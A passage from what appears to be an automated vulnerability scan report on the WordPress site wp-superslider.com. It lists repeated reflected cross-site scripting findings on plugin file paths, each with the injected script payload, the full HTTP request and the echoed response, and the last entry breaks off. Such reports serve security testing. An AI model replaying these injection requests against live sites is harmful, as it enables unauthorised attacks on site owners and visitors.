Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427c3"><script>alert(1)</script>6ae2ba26414 was submitted in the REST URL parameter 1. This input was echoed as 427c3\"><script>alert(1)</script>6ae2ba26414 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site427c3"><script>alert(1)</script>6ae2ba26414/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:02 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site427c3\"><script>alert(1)</script>6ae2ba26414/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js" />
...[SNIP]...

4.162. http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5400"><script>alert(1)</script>18ede8274ac was submitted in the REST URL parameter 2. This input was echoed as b5400\"><script>alert(1)</script>18ede8274ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-contentb5400"><script>alert(1)</script>18ede8274ac/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-contentb5400\"><script>alert(1)</script>18ede8274ac/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js" />
...[SNIP]...

4.163. http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29535"><script>alert(1)</script>bb1a33e1d72 was submitted in the REST URL parameter 3. This input was echoed as 29535\"><script>alert(1)</script>bb1a33e1d72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins29535"><script>alert(1)</script>bb1a33e1d72/si-contact-form/captcha-secureimage/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins29535\"><script>alert(1)</script>bb1a33e1d72/si-contact-form/captcha-secureimage/ctf_captcha.js" />
...[SNIP]...

4.164. http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcc9c"><script>alert(1)</script>406f3f1b80a was submitted in the REST URL parameter 4. This input was echoed as fcc9c\"><script>alert(1)</script>406f3f1b80a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/si-contact-formfcc9c"><script>alert(1)</script>406f3f1b80a/captcha-secureimage/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674588; expires=Thu, 02-Feb-2012 19:23:08 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/si-contact-formfcc9c\"><script>alert(1)</script>406f3f1b80a/captcha-secureimage/ctf_captcha.js" />
...[SNIP]...

4.165. http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21998"><script>alert(1)</script>61808997102 was submitted in the REST URL parameter 5. This input was echoed as 21998\"><script>alert(1)</script>61808997102 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/si-contact-form/captcha-secureimage21998"><script>alert(1)</script>61808997102/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674589+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/si-contact-form/captcha-secureimage21998\"><script>alert(1)</script>61808997102/ctf_captcha.js" />
...[SNIP]...

4.166. http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be147"><script>alert(1)</script>60a126f5ab0 was submitted in the REST URL parameter 6. This input was echoed as be147\"><script>alert(1)</script>60a126f5ab0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.jsbe147"><script>alert(1)</script>60a126f5ab0 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:11 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674591+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674591; expires=Thu, 02-Feb-2012 19:23:11 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.jsbe147\"><script>alert(1)</script>60a126f5ab0" />
...[SNIP]...

4.167. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82727"><script>alert(1)</script>61afe33f333 was submitted in the REST URL parameter 1. This input was echoed as 82727\"><script>alert(1)</script>61afe33f333 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site82727"><script>alert(1)</script>61afe33f333/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674542+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674542; expires=Thu, 02-Feb-2012 19:22:22 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:22 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site82727\"><script>alert(1)</script>61afe33f333/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css" />
...[SNIP]...

4.168. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8345f"><script>alert(1)</script>a5d18f0e20a was submitted in the REST URL parameter 2. This input was echoed as 8345f\"><script>alert(1)</script>a5d18f0e20a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content8345f"><script>alert(1)</script>a5d18f0e20a/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674544+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674544; expires=Thu, 02-Feb-2012 19:22:24 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:24 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content8345f\"><script>alert(1)</script>a5d18f0e20a/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css" />
...[SNIP]...

4.169. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b6e4"><script>alert(1)</script>1a8376b51b was submitted in the REST URL parameter 3. This input was echoed as 2b6e4\"><script>alert(1)</script>1a8376b51b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins2b6e4"><script>alert(1)</script>1a8376b51b/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:25 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674545; expires=Thu, 02-Feb-2012 19:22:25 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:25 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins2b6e4\"><script>alert(1)</script>1a8376b51b/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css" />
...[SNIP]...

4.170. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8dbd"><script>alert(1)</script>faa582e2f65 was submitted in the REST URL parameter 4. This input was echoed as c8dbd\"><script>alert(1)</script>faa582e2f65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-excerptc8dbd"><script>alert(1)</script>faa582e2f65/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674547+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674547; expires=Thu, 02-Feb-2012 19:22:27 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:27 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-excerptc8dbd\"><script>alert(1)</script>faa582e2f65/plugin-data/superslider/ssExcerpt/default/default.css" />
...[SNIP]...

4.171. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 367a3"><script>alert(1)</script>72b3425ad17 was submitted in the REST URL parameter 5. This input was echoed as 367a3\"><script>alert(1)</script>72b3425ad17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-excerpt/plugin-data367a3"><script>alert(1)</script>72b3425ad17/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:28 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674548+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674549; expires=Thu, 02-Feb-2012 19:22:29 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:29 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-excerpt/plugin-data367a3\"><script>alert(1)</script>72b3425ad17/superslider/ssExcerpt/default/default.css" />
...[SNIP]...

4.172. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51aa1"><script>alert(1)</script>6001cc5eecf was submitted in the REST URL parameter 6. This input was echoed as 51aa1\"><script>alert(1)</script>6001cc5eecf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider51aa1"><script>alert(1)</script>6001cc5eecf/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
